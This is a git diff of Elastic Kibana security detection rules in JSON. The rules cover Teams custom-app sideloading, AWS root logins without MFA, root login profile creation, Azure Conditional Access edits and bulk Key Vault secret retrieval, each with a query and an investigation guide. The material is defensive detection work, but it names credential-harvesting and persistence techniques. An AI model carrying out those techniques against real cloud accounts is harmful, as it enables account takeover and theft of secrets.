"https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json b/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json deleted file mode 100644 index c6f857db24b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bbd1a775-8267-41fa-9232-20e5582596ac_208.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when custom 
applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment.", - "false_positives": [ - "Custom applications may be allowed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Teams Custom Application Interaction Allowed", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Teams Custom Application Interaction Allowed\n\nMicrosoft Teams allows organizations to enhance functionality by integrating custom applications, which can be developed and uploaded beyond the standard app store offerings. While beneficial for tailored solutions, this capability can be exploited by adversaries to maintain unauthorized access. The detection rule monitors changes in tenant settings that permit custom app interactions, flagging successful modifications as potential persistence threats.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action: TeamsTenantSettingChanged to identify when the change was made and by whom.\n- Verify the identity of the user or account associated with the event to determine if the change was authorized or if the account may have been compromised.\n- Check the o365.audit.Name field for \"Allow sideloading and interaction of custom apps\" to confirm that the alert corresponds to enabling custom app interactions.\n- Investigate the o365.audit.NewValue field to ensure it is set to True, indicating that the setting was indeed changed to allow custom apps.\n- Assess the event.outcome field to confirm the change was successful and not a failed attempt, which could indicate a different type of issue.\n- Examine any recent custom applications uploaded to Microsoft Teams to ensure they are legitimate and not potentially malicious.\n- Cross-reference with other security alerts or logs to identify any unusual activity around the time of the setting change that might suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative changes to Microsoft Teams settings can trigger this rule. If a known and authorized administrator frequently updates tenant settings to allow custom apps, consider creating an exception for their user account to reduce noise.\n- Organizations that regularly develop and deploy custom applications for internal use may see frequent alerts. In such cases, establish a process to document and approve these changes, and use this documentation to create exceptions for specific application deployment activities.\n- Scheduled updates or maintenance activities that involve enabling custom app interactions might be misidentified as threats. 
Coordinate with IT teams to schedule these activities and temporarily adjust monitoring rules to prevent false positives during these periods.\n- If a third-party service provider is authorized to manage Teams settings, their actions might trigger alerts. Verify their activities and, if consistent and legitimate, add their actions to an exception list to prevent unnecessary alerts.\n- Changes made during a known testing or development phase can be mistaken for unauthorized access. Clearly define and communicate these phases to the security team, and consider temporary rule adjustments to accommodate expected changes.\n\n### Response and remediation\n\n- Immediately disable the custom application interaction setting in Microsoft Teams to prevent further unauthorized access or persistence by adversaries.\n- Conduct a thorough review of all custom applications currently uploaded to Microsoft Teams to identify any unauthorized or suspicious applications. Remove any that are not recognized or approved by the organization.\n- Analyze the audit logs for any recent changes to the Teams settings and identify the user account responsible for enabling custom application interactions. Investigate the account for signs of compromise or misuse.\n- Reset the credentials and enforce multi-factor authentication for the account(s) involved in the unauthorized change to prevent further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident and the actions taken. Escalate to higher management if the breach is suspected to have wider implications.\n- Implement additional monitoring and alerting for changes to Microsoft Teams settings to quickly detect and respond to similar threats in the future.\n- Review and update the organization's security policies and procedures regarding the use of custom applications in Microsoft Teams to ensure they align with best practices and mitigate the risk of similar incidents.", - "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Name", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.NewValue", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - 
"technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 208 - }, - "id": "bbd1a775-8267-41fa-9232-20e5582596ac_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json new file mode 100644 index 00000000000..983a87cd95b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA.", + "false_positives": [ + "Some organizations allow login with the root user without MFA, however, this is not considered best practice by AWS and increases the risk of compromised credentials." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Deprecated - AWS Root Login Without MFA", + "note": "## Triage and analysis\n\n### Investigating Deprecated - AWS Root Login Without MFA\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your user name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for their user name and password, as well as for an authentication code from their AWS MFA device. Taken together, these multiple factors provide increased security for your AWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account, which is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your everyday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create your first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and service management tasks. Amazon provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to AWS as the root user without using multi-factor authentication (MFA), meaning the account is not secured properly.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. 
Do they look normal for the calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity is not inherently malicious, the root account must use MFA. The security team should address any potential benign true positive (B-TP), as this configuration can risk the entire cloud environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the criticality of the services or servers involved.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and\n aws.cloudtrail.user_identity.type:Root and\n aws.cloudtrail.console_login.additional_eventdata.mfa_used:false and\n event.outcome:success\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "type": "boolean" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route53", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 212 + }, + "id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc_212", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json b/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json deleted file mode 100644 index 87771edbf8f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/bc48bba7-4a23-4232-b551-eca3ca1e3f20_103.json +++ /dev/null @@ -1,82 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Conditional Access policy is modified. Azure Conditional Access policies control access to resources via if-then statements. For example, if a user wants to access a resource, then they must complete an action such as using multi-factor authentication to access it. An adversary may modify a Conditional Access policy in order to weaken their target's security controls.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Conditional Access Policy Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Conditional Access Policy Modified\n\nAzure Conditional Access policies are critical for managing secure access to resources by enforcing specific conditions, such as requiring multi-factor authentication. Adversaries may exploit this by altering policies to weaken security, potentially bypassing authentication measures. The detection rule monitors logs for successful modifications to these policies, flagging potential unauthorized changes that could indicate malicious activity.\n\n### Possible investigation steps\n\n- Review the Azure activity and audit logs to identify the specific user account associated with the \"Update conditional access policy\" action and verify if the modification was authorized.\n- Examine the details of the modified Conditional Access policy to understand the changes made, focusing on any alterations that could weaken security, such as the removal of multi-factor authentication requirements.\n- Check the event.outcome field to confirm the success of the policy modification and correlate it with any recent access attempts or suspicious activities involving the affected resources.\n- Investigate the history of changes to the Conditional Access policies to identify any patterns or repeated unauthorized modifications that could indicate persistent malicious activity.\n- Assess the user's role and permissions to determine if they have legitimate access to modify Conditional Access policies, and review any recent changes to their account or role assignments.\n\n### False positive analysis\n\n- Routine administrative updates to Conditional Access policies by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled policy reviews and updates as part of regular security audits may also result in false positives. 
Document these activities and schedule them during known maintenance windows to differentiate them from unauthorized changes.\n- Automated scripts or tools used for policy management might generate alerts if they modify policies. Ensure these tools are properly documented and their actions are logged separately to distinguish them from potential threats.\n- Changes made during the onboarding or offboarding of employees can appear as suspicious activity. Implement a process to log these events separately and cross-reference them with HR records to verify legitimacy.\n- Integration with third-party security solutions that modify policies for compliance or optimization purposes can lead to false positives. Establish a clear change management process and whitelist these integrations to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately review the modified Conditional Access policy to understand the changes made and assess the potential impact on security controls.\n- Revert any unauthorized or suspicious changes to the Conditional Access policy to restore the original security posture.\n- Conduct a thorough investigation to identify the source of the modification, including reviewing audit logs for unusual activity or unauthorized access attempts.\n- Temporarily increase monitoring and logging of Conditional Access policy changes to detect any further unauthorized modifications.\n- Notify the security team and relevant stakeholders about the incident and the steps taken to mitigate the risk.\n- If malicious activity is confirmed, initiate an incident response process, including isolating affected accounts and conducting a full security assessment.\n- Implement additional security measures, such as stricter access controls or enhanced multi-factor authentication requirements, to prevent similar incidents in the future.", - "query": "event.dataset:(azure.activitylogs or azure.auditlogs) and\nevent.action:\"Update conditional access policy\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - }, - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "bc48bba7-4a23-4232-b551-eca3ca1e3f20_103", - "type": "security-rule" -} \ No newline at end of file diff --git 
a/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json new file mode 100644 index 00000000000..540d3a8a980 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c04be7e0-b0fc-11ef-a826-f661ea17fbce_4.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies creation of a console login profile for the AWS account root user. While CreateLoginProfile normally applies to IAM users, when performed from a temporary root session (e.g., via AssumeRoot) and the userName parameter is omitted, the profile is created for the root principal (self-assigned). Adversaries with temporary root access may add or reset the root login profile to establish persistent console access even if original access keys are rotated or disabled. Correlate with recent AssumeRoot/STS activity and validate intent with the account owner.", + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM Login Profile Added for Root", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\nThis rule detects when a console login profile is created for the AWS root account. \nA login profile enables password-based console access, and because the root user has unrestricted privileges, creating one is an extremely high-impact event. Adversaries who temporarily gain root-level credentials (for example, through an STS session or credential compromise) may use `CreateLoginProfile` without specifying a `userName` to add a password to the root account. This grants persistent access even if the attacker\u2019s API keys are later rotated or disabled.\n\n### Possible investigation steps\n\n**Assess the timing and context of the event**\n- Review the `@timestamp` to determine when the `CreateLoginProfile` call occurred. \n - Correlate this time window with other root or IAM activity such as `AssumeRoot`, `GetSessionToken`, `ConsoleLogin`, or `CreateAccessKey`. 
\n - Check for follow-on activity, especially `ConsoleLogin` events or `UpdateLoginProfile`, which may indicate that the root password was used immediately after creation.\n\n**Investigate event origin and session details**\n- Review `source.ip` and `user_agent.original`:\n - Determine if the request originated from an expected network range, VPN endpoint, or geolocation.\n - Identify whether the access was interactive (for example, browser or AWS console) or automated (`aws-cli`, SDK, or API client).\n- Examine `aws.cloudtrail.user_identity.access_key_id` and associated STS session context to see if temporary credentials were used.\n- Compare this event\u2019s IP and access key to any other recent CloudTrail activity to identify potential lateral movement or multi-account access attempts.\n\n**Analyze the login profile creation**\n- Review `aws.cloudtrail.request_parameters` and `aws.cloudtrail.response_elements`:\n - Check whether `passwordResetRequired` was set to `true` or omitted; absence may imply that the attacker created a password they intend to reuse.\n- Cross-reference this action with previous failed login attempts, password recovery requests, or `AssumeRoot` behavior.\n\n**Correlate related identity and access behavior**\n- Search for additional IAM management activity:\n - `AttachUserPolicy`, `AttachRolePolicy`, or `PutUserPolicy` granting elevated permissions.\n - New `AccessKey` creation or `UpdateAccessKey` events tied to the same session.\n- Review GuardDuty findings or any other detections referencing this account or IP around the same time period.\n- If available, correlate with CloudTrail to detect if other resource creation or configuration changes followed the login profile addition.\n\n**Validate with account owner or authorized personnel**\n- Contact the designated account or root credential owner to confirm whether this action was intentional (for example, during an account recovery).\n- Review any internal change-management or service ticketing systems for an approved request matching this activity.\n\n### False positive analysis\n\nAlthough rare, legitimate scenarios include:\n- **Authorized account recovery**: An administrator or AWS Support might temporarily add a root login profile to regain access. Validate against documented recovery workflows. \n- **Controlled testing or sandbox environments**: Certain sandbox accounts may reuse root credentials for automation or demonstration purposes. Tag and exclude these accounts from this rule where appropriate. \n- **Automated provisioning**: Review any account bootstrap or recovery automation scripts that may invoke `CreateLoginProfile` on root credentials.\n\nFor any potential false positive, verify that:\n- The `source.ip` and `user_agent.original` values align with expected administrative locations and tools. \n- The change was recorded during a maintenance window or known security operation.\n\n### Response and remediation\n\n> Any unapproved creation of a login profile for the root account is a critical security incident requiring immediate containment and credential rotation.\n\n**1. Containment**\n- Delete the newly created root login profile if it was not authorized. \n- Rotate the root account password using AWS\u2019s official password-reset workflow. \n- Revoke any active sessions, temporary credentials, or tokens associated with this event. \n- Verify that multi-factor authentication (MFA) is enabled and functioning on the root account. 
\n- Check that no root access keys exist \u2014 if present, remove them immediately.\n\n**2. Investigation and scoping**\n- Examine CloudTrail logs from 30 minutes before and after this event to identify correlated actions. \n- Capture and securely store these logs in an isolated S3 bucket with Object Lock enabled to preserve forensic integrity. \n- Investigate for additional IAM or STS operations by the same `access_key_id` or IP address that may indicate privilege escalation or persistence attempts. \n- Review whether any new IAM roles, users, or policies were created in proximity to this event.\n\n**3. Recovery and hardening**\n- Reset the root password and distribute the new credentials securely to authorized custodians only. \n- Ensure MFA is enforced for all administrative and root-level access. \n- Audit all IAM policies for least-privilege adherence, focusing on `iam:CreateLoginProfile`, `iam:UpdateLoginProfile`, and `iam:CreateAccessKey` permissions. \n- Enable CloudTrail, GuardDuty, AWS Config, and Security Hub across all regions for continuous monitoring of root and IAM activity. \n- Review your organization\u2019s playbooks and detection coverage for root-level persistence techniques, and update procedures as needed.\n\n**4. Post-incident actions**\n- Notify AWS account owners and your security operations center of the incident. \n- Conduct a post-mortem to determine the initial vector of compromise (e.g., stolen credentials, misconfigured role chaining, or insufficient MFA). \n- Update alerting thresholds and detection logic to minimize mean time to detect (MTTD) and respond (MTTR).\n\n### Additional information\n\n- **AWS Incident Response Playbooks** \n - [IRP-CredCompromise](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/IRP-CredCompromise.md) \u2013 Containment and recovery for suspected credential abuse. \n- **AWS Customer Playbook Framework** \n - [Compromised_IAM_Credentials.md](https://github.com/aws-samples/aws-customer-playbook-framework/blob/a8c7b313636b406a375952ac00b2d68e89a991f2/docs/Compromised_IAM_Credentials.md) \u2013 Steps to contain, investigate, and recover from credential compromise. 
\n- **AWS Documentation** \n - [CreateLoginProfile API Reference](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) \n - [Root User Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/root-user-best-practices.html)\n", + "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateLoginProfile\"\n and aws.cloudtrail.user_identity.type == \"Root\"\n and event.outcome == \"success\"\n and not stringContains(aws.cloudtrail.request_parameters, \"userName=\")\n", + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c04be7e0-b0fc-11ef-a826-f661ea17fbce", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + }, + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "c04be7e0-b0fc-11ef-a826-f661ea17fbce_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json b/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json new file mode 100644 index 00000000000..f2ef51b67f6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c07f7898-5dc3-11f0-9f27-f661ea17fbcd_4.json @@ -0,0 +1,75 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. 
The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information.", + "false_positives": [ + "Service accounts or applications that frequently access Azure Key Vault for configuration or operational purposes may trigger this rule.", + "Automated scripts or processes that retrieve secrets or keys for legitimate purposes, such as secret rotation or application configuration, may also lead to false positives.", + "Security teams performing routine audits or assessments that involve retrieving keys or secrets from Key Vaults may trigger this rule if they perform multiple retrievals in a short time frame." + ], + "from": "now-9m", + "interval": "8m", + "language": "esql", + "license": "Elastic License v2", + "name": "Excessive Secret or Key Retrieval from Azure Key Vault", + "note": "## Triage and analysis\n\n### Investigating Excessive Secret or Key Retrieval from Azure Key Vault\n\nAzure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. It is crucial for managing sensitive data in Azure environments. Unauthorized modifications to Key Vaults can lead to data breaches or service disruptions. This rule detects excessive secret or key retrieval operations from Azure Key Vault, which may indicate potential abuse or unauthorized access attempts.\n\n### Possible investigation steps\n- Review the `azure.platformlogs.identity.claim.upn` field to identify the user principal making the retrieval requests. This can help determine if the activity is legitimate or suspicious.\n- Check the `azure.platformlogs.identity.claim.appid` or `azure.platformlogs.identity.claim.appid_display_name` to identify the application or service making the requests. If the application is not recognized or authorized, it may indicate a potential security incident. It is plausible that the application is a FOCI-compliant application; such applications are commonly abused by adversaries to evade security controls or conditional access policies.\n- Analyze the `azure.platformlogs.resource.name` field to determine which Key Vault is being accessed. This can help assess the impact of the retrieval operations and whether they target sensitive resources.\n- Review the `event.action` field to confirm the specific actions being performed, such as `KeyGet`, `SecretGet`, or `CertificateGet`. These actions indicate retrieval of keys, secrets, or certificates from the Key Vault.\n- Check the `source.ip` or `source.geo.*` fields to identify the source of the retrieval requests. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior.\n- Use the `time_window` field to analyze the frequency of retrieval operations. If multiple retrievals occur within a short time frame (e.g., within a few minutes), it may indicate excessive or suspicious activity.\n- Correlate the retrieval operations with other security events or alerts in the environment to identify any patterns or related incidents.\n- Triage the user with Entra ID sign-in logs to gather more context about their authentication behavior and any potential anomalies.\n\n### False positive analysis\n- Routine administrative tasks or automated scripts may trigger excessive retrievals, especially in environments where Key Vaults are heavily utilized for application configurations or secrets management. 
If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Legitimate applications or services may perform frequent retrievals of keys or secrets for operational purposes, such as configuration updates or secret rotation. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n- Security teams may perform periodic audits or assessments that involve retrieving keys or secrets from Key Vaults. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications.\n- Some applications may require frequent access to keys or secrets for normal operation, leading to high retrieval counts. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals.\n\n### Response and remediation\n- Investigate the user principal making the excessive retrieval requests to determine if they are authorized to access the Key Vault and its contents. If the user is not authorized, take appropriate actions to block their access and prevent further unauthorized retrievals.\n- Review the application or service making the requests to ensure it is legitimate and authorized to access the Key Vault. If the application is unauthorized or suspicious, consider blocking it and revoking its permissions to access the Key Vault.\n- Assess the impact of the excessive retrieval operations on the Key Vault and its contents. Determine if any sensitive data was accessed or compromised during the retrievals.\n- Implement additional monitoring and alerting for the Key Vault to detect any further suspicious activity or unauthorized access attempts.\n- Consider implementing stricter access controls or policies for Key Vaults to limit excessive retrievals and ensure that only authorized users and applications can access sensitive keys and secrets.\n- Educate users and administrators about the risks associated with excessive retrievals from Key Vaults and encourage them to follow best practices for managing keys and secrets in Azure environments.\n", + "query": "from logs-azure.platformlogs-* metadata _id, _index\n\n// Filter for Azure Key Vault read operations\n| where event.dataset == \"azure.platformlogs\"\n and event.action in (\n \"VaultGet\",\n \"KeyGet\",\n \"KeyList\",\n \"KeyListVersions\",\n \"KeyGetDeleted\",\n \"KeyListDeleted\",\n \"SecretGet\",\n \"SecretList\",\n \"SecretListVersions\",\n \"SecretGetDeleted\",\n \"SecretListDeleted\",\n \"CertificateGet\",\n \"CertificateList\",\n \"CertificateListVersions\",\n \"CertificateGetDeleted\",\n \"CertificateListDeleted\",\n \"CertificatePolicyGet\",\n \"CertificateContactsGet\",\n \"CertificateIssuerGet\",\n \"CertificateIssuersList\"\n )\n\n// Truncate timestamps into 1-minute windows\n| eval Esql.time_window_date_trunc = date_trunc(1 minute, @timestamp)\n\n// Aggregate identity, geo, resource, and activity info\n| stats\n Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn),\n Esql.azure_platformlogs_identity_claim_upn_count_distinct = 